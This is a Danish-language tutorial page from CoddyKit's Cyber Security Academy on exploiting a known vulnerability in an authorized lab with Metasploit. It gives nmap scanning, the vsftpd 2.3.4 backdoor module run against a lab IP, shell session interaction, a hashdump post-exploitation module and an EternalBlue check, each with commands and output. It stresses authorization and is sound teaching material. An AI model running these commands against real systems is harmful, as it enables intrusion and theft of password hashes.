Udnyttelse af en kendt sårbarhed
Brug et exploitmodul mod et sårbart mål i et laboratoriemiljø, og fortolk sessionsoutputtet.
Udnyttelse af en kendt sårbarhed er en gratis Cyber Security Academy-lektion på CoddyKit. Dette er lektion 2 af 4. Du kan læse alle 3 lektioner i dette læringsspor gratis i deres fulde længde — derefter låser CoddyKit PRO alle lektioner op samt praktiske øvelser med en indbygget kodeeditor og en AI-underviser døgnet rundt. Den er en del af læringsforløbet i Cyber Security Academy, og dine fremskridt synkroniseres på tværs af nettet og CoddyKit-appen. Cyber Security Academy-kurset indeholder 4 lektioner i alt.
Etik og autorisation først
Udnyttelse er kun lovlig mod systemer, du ejer, eller som du har udtrykkelig skriftlig tilladelse til at teste. Alle eksempler her er beregnet til autoriserede laboratoriemiljøer. Uautoriseret udnyttelse er en strafbar handling.
Anbefaling til laboratorieopsætning
Brug med vilje sårbare virtuelle maskiner: Metasploitable2/3, DVWA, VulnHub-maskiner eller HackTheBox/TryHackMe til lovlig øvelse. Test aldrig produktionssystemer eller rigtige systemer uden et underskrevet dokument, der fastlægger omfanget.
# Download Metasploitable2
# https://sourceforge.net/projects/metasploitable/
# Or use VulnHub
# https://www.vulnhub.com/
# Network: host-only adapter (isolated)Rekognoscering før udnyttelse
Kortlæg altid systemet, før du forsøger at udnytte det. Kend den nøjagtige tjenesteversion, operativsystemet og konteksten, før du vælger et exploit. Forkert version = mislykket udnyttelse eller systemnedbrud.
sudo nmap -sV -O 192.168.1.100
# Identify:
# - OS version
# - Service + exact version
# - Open ports
# Then search Metasploit for matching exploitValg af det rigtige exploit
Søg efter tjenestenavn og version. Foretræk moduler med rangeringen Excellent eller Great. Læs info for at bekræfte, at målplatformen og versionsintervallet passer.
msf6 > search vsftpd 2.3.4
# exploit/unix/ftp/vsftpd_234_backdoor
# Rank: Excellent
msf6 > info exploit/unix/ftp/vsftpd_234_backdoorKonfiguration og kørsel af exploit
Angiv RHOSTS (fjernmål), LHOST (din IP-adresse til omvendte forbindelser) og LPORT (lytteporten), vælg en payload, og kør den derefter. Hold øje med oprettelse af sessioner eller fejlmeddelelser.
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > set RHOSTS 192.168.1.100
msf6 > set payload cmd/unix/interact
msf6 > run
# [*] Command shell session 1 openedFortolkning af resultater
Et vellykket exploit åbner en session. Mislykkede exploits viser fejlmeddelelser: forbindelsen blev afvist (porten er ikke åben), exploit mislykkedes (forkert version), ingen session blev oprettet (payloaden kunne ikke oprette forbindelse tilbage).
# Success:
[*] Started reverse TCP handler
[*] Command shell session 1 opened
# Failure:
[-] Exploit aborted: Bad return value from check
[-] Exploit failed: No session was createdInteraktion med en session
Efter udnyttelsen kan du interagere med sessionen ved hjælp af sessions -i . Enkle kommandoskalsessioner giver en terminal, mens Meterpreter-sessioner giver en omfattende API.
msf6 > sessions # list all sessions
msf6 > sessions -i 1 # interact with session 1
# Once inside:
id
whoami
ifconfig
uname -aBaggrund og flere sessioner
Tryk på Ctrl+Z for at sætte en session i baggrunden og vende tilbage til msfconsole. Det giver dig mulighed for at administrere flere sessioner eller køre moduler til efterfølgende udnyttelse mod en bestemt session.
# Background active session
Ctrl+Z
# List sessions
msf6 > sessions
# Run post module against session 1
msf6 > use post/linux/gather/hashdump
msf6 > set SESSION 1
msf6 > runKontrolkommando
Mange exploit-moduler implementerer kommandoen check, som tester, om målet er sårbart, uden faktisk at udnytte det. Kør altid check først, hvis det er tilgængeligt.
msf6 exploit(ms17_010_eternalblue) > check
# [+] 192.168.1.100:445 - The target is vulnerable.
# Or:
# [-] 192.168.1.100:445 - The target is not vulnerable.Overvejelser om exploits' pålidelighed
Exploits kan få tjenester til at gå ned, udløse alarmer eller efterlade logfiler. Ved vurderinger af produktionssystemer skal du køre exploits i perioder med lav trafik, have en plan for tilbagerulning og bekræfte, at der findes sikkerhedskopier, før du kører noget destruktivt.
Dokumentation af udnyttelsen
Registrér tidsstempel, mål-IP-adresse og port, det anvendte exploit-modul, CVE-nummer, den anvendte payload, den opnåede session og dokumentation (skærmbillede eller terminaloutput). Det er dit bevis på sårbarheden i rapporten.
Hurtigt tjek
Hvad gør Metasploits "check"-kommando?
Opsummering: Udnyttelse af sårbarheder
Etisk udnyttelse følger et klart forløb: Indhent skriftlig tilladelse, kortlæg systemet omhyggeligt, vælg det passende exploit, læs moduloplysningerne, kør check først, hvis det er tilgængeligt, udfør det, og dokumentér alt. Udnyt aldrig systemer uden tilladelse — den tekniske kunnen og den etiske grænse kan ikke adskilles.
Lær Cyber Security Academy med en AI-underviser — gratis
Skriv og kør rigtig kode i din browser, få øjeblikkelig hjælp fra en AI-underviser døgnet rundt, og fortsæt, hvor du slap, på web eller i appen.
- Kurser
- 76
- Lektioner
- 303
Ofte stillede spørgsmål
Er lektionen “Udnyttelse af en kendt sårbarhed” gratis?
Ja — alle 3 lektioner i læringssporet Cyber Security Academy, inklusive “Udnyttelse af en kendt sårbarhed”, kan læses gratis i deres fulde længde her på webstedet. Derefter låser CoddyKit PRO alle lektioner op samt interaktive øvelser med en indbygget kodeeditor og en AI-underviser døgnet rundt. Cyber Security Academy-kurset indeholder 4 lektioner i alt.
Hvad lærer jeg i “Udnyttelse af en kendt sårbarhed”?
Brug et exploitmodul mod et sårbart mål i et laboratoriemiljø, og fortolk sessionsoutputtet. Du øver dig i Cyber Security Academy med praktisk kode, som du kører direkte i browseren, og en AI-vejleder døgnet rundt besvarer dine spørgsmål, mens du arbejder dig gennem lektionen.
Skal jeg have erfaring for at begynde på Cyber Security Academy?
Der kræves ingen tidligere erfaring. Cyber Security Academy på CoddyKit er tilrettelagt for både begyndere og øvede, så du kan starte her eller fra begyndelsen og lære i dit eget tempo. Dette er lektion 2 af 4.
Hvor lang tid tager lektionen “Udnyttelse af en kendt sårbarhed”?
De fleste CoddyKit-lektioner tager cirka 5–10 minutter. Hver lektion er kort og interaktiv, så du gør løbende fremskridt og kan fortsætte, hvor du slap – på både web og app.
Kan jeg skrive og køre kode i denne Cyber Security Academy-lektion?
Ja. Alle Cyber Security Academy-lektioner har en indbygget kodeeditor, så du kan skrive og køre rigtig kode direkte i din browser og få øjeblikkelig feedback fra AI – uden lokal opsætning.
Alle lektioner i dette kursus
- Metasploit-arkitektur og msfconsole
- Udnyttelse af en kendt sårbarhed
- Payloads: Staged kontra stageless, Meterpreter
- Efter exploitering: Pivotering og persistens